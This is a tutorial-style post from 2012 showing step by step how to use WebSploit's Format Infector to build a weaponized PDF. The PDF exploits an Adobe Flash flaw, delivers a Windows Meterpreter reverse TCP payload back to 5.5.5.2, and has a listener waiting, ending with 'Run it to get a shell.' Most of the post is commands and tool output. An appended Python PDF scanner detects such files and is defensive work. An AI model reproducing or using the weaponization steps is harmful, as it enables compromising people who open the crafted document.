WebSploit 2: Local File Vulnerabilities
Posted on 2012-10-2 15:54:21
Start it:
root@Dis9Team:/pen/WebSploit# ./websploit

Look at the options and select [4] Format Infector         Inject Custom Payload Into File Formats

Continue. It offers this many formats, 6 vulnerabilities:

ID & Format                 Description
        ------------                --------------
        [1]PDF                         Adobe Flash Player [newfunction] Invalid Pointer Use
        [2]RTF                         Microsoft Word RTF [pFragments] Stack Buffer Overflow
        [3]PPT                         Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow
        [4]XLS                         Microsoft Excel Malformed FEATHEADER Record Vulnerability
        [5]VBP                         Microsoft Visual Basic VBP Buffer Overflow
        [6]EPS                         Adobe Illustrator CS4 v14.0.0
They are all Windows file formats. Select 1:
wsf:Infector > Enter ID Of Format : 1
Configure the IP:
wsf:Infector > Enter Your IP Address (Use In Reverse Payload) : 5.5.5.2
Choose the backdoor type:
ID & Payload                 Description
        ------------                --------------
        [1]Bind TCP                 Windows Meterpreter (Reflective Injection), Bind TCP Stager
        [2]Reverse TCP                 Windows Meterpreter (Reflective Injection), Reverse TCP Stager
        [3]DLL,Reverse                 Reflective Dll Injection, Reverse TCP Stager
        [4]DLL,Bind                 Reflective Dll Injection, Bind TCP Stager

wsf:Infector > Select Payload : 2

Configure the Metasploit file generation:
[*] The initial module cache will be built in the background, this can take 2-5 minutes...

# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 901 exploits - 491 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops
       =[ svn r15622 updated today (2012.07.12)

PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 5.5.5.2
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf

[*] Do You Want To Create Listener ? <y/n> :y
[*] Please wait while we load the module tree...
[*] The initial module cache will be built in the background, this can take 2-5 minutes...

_                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\


       =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
+ -- --=[ 901 exploits - 491 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops
       =[ svn r15622 updated today (2012.07.12)

PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 5.5.5.2
[*] Started reverse handler on 5.5.5.2:4444
[*] Starting the payload handler...
Take a look:
root@Dis9Team:/pen/WebSploit# file /root/.msf4/local/msf.pdf
/root/.msf4/local/msf.pdf: PDF document, version 1.5
root@Dis9Team:/pen/WebSploit#
Run it to get a shell.



Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one know weapons.
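The post checks the generated file with `file`, which reports "PDF document, version 1.5" because it only reads the `%PDF-` header; a weaponized document of the kind the Format Infector produces looks identical to a benign one at that level. The following Python script is an added defensive example, not part of the original post and not code from WebSploit or Metasploit: it inspects raw PDF bytes for the objects such documents rely on (auto-run actions such as `/OpenAction` and `/AA`, `/JavaScript` and `/JS`, `/Launch`, `/RichMedia`, `/EmbeddedFile`) and for SWF magic bytes, and it inflates `/FlateDecode` streams first so that names hidden inside compressed objects are not missed. The two sample PDFs are constructed inline; the risky-name list and the triage rule in `verdict` are this example's own assumptions, not an authoritative signature set.

```python
import re
import zlib

# PDF name objects that ordinary documents rarely need but that weaponized
# PDFs (auto-run JavaScript, embedded Flash, dropped files) commonly use.
# This list is an assumption made for the example, not a vendor signature set.
RISKY_NAMES = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch",
               b"/RichMedia", b"/EmbeddedFile"]

# Uncompressed, zlib-compressed and LZMA-compressed SWF files start with
# FWS / CWS / ZWS followed by a one-byte version number.
SWF_MAGIC_RE = re.compile(rb"[FCZ]WS[\x01-\x20]")


def inflate_streams(data: bytes) -> bytes:
    """Return the decoded contents of every stream object in `data`.

    Objects inside a /FlateDecode stream are invisible to a plain byte
    search, so each stream body is run through zlib; bodies that were not
    deflated are kept as-is.
    """
    decoded = []
    for m in re.finditer(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", data, re.S):
        body = m.group(1)
        try:
            decoded.append(zlib.decompress(body))
        except zlib.error:
            decoded.append(body)
    return b"\n".join(decoded)


def scan_pdf(data: bytes) -> dict:
    """Inspect raw PDF bytes and report header version, risky names and SWF magic."""
    header = re.match(rb"%PDF-(\d\.\d)", data)
    visible = data + b"\n" + inflate_streams(data)
    # A name must end at a non-letter so that /JS does not also match /JSxyz.
    names = [n.decode() for n in RISKY_NAMES
             if re.search(re.escape(n) + rb"(?![A-Za-z])", visible)]
    return {
        "version": header.group(1).decode() if header else None,
        "risky_names": names,
        "swf_magic": SWF_MAGIC_RE.search(visible) is not None,
    }


def verdict(findings: dict) -> str:
    """Crude triage rule (an assumption): auto-run actions, Launch, RichMedia
    or SWF bytes mean 'suspicious'; any other risky name means 'review'."""
    if findings["version"] is None:
        return "not-a-pdf"
    hard = {"/OpenAction", "/AA", "/Launch", "/RichMedia"}
    if findings["swf_magic"] or hard & set(findings["risky_names"]):
        return "suspicious"
    if findings["risky_names"]:
        return "review"
    return "clean"


# Constructed sample 1: a minimal, benign single-page PDF.
BENIGN_PDF = (
    b"%PDF-1.5\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

# Constructed sample 2: the same skeleton, but the catalog auto-runs a
# JavaScript action and a deflated stream hides a RichMedia dictionary with
# SWF magic bytes. `file` still describes this as "PDF document, version 1.5".
_hidden = zlib.compress(b"<< /Type /RichMedia /Subtype /Flash >> CWS\x0a\x00\x00")
SUSPICIOUS_PDF = (
    b"%PDF-1.5\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
    b"4 0 obj << /S /JavaScript /JS (app.alert(1)) >> endobj\n"
    b"5 0 obj << /Length " + str(len(_hidden)).encode() + b" /Filter /FlateDecode >>\n"
    b"stream\n" + _hidden + b"\nendstream\nendobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_PDF), ("suspicious", SUSPICIOUS_PDF)):
        findings = scan_pdf(blob)
        print(label, verdict(findings), findings)
```

Run the script as-is to see both samples triaged, or call `scan_pdf(open(path, "rb").read())` on a real file. The check is deliberately a byte-level one: it does not parse the object tree, so it also sees names inside malformed objects that a strict parser would reject, at the cost of possible false positives on legitimate forms that use JavaScript.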
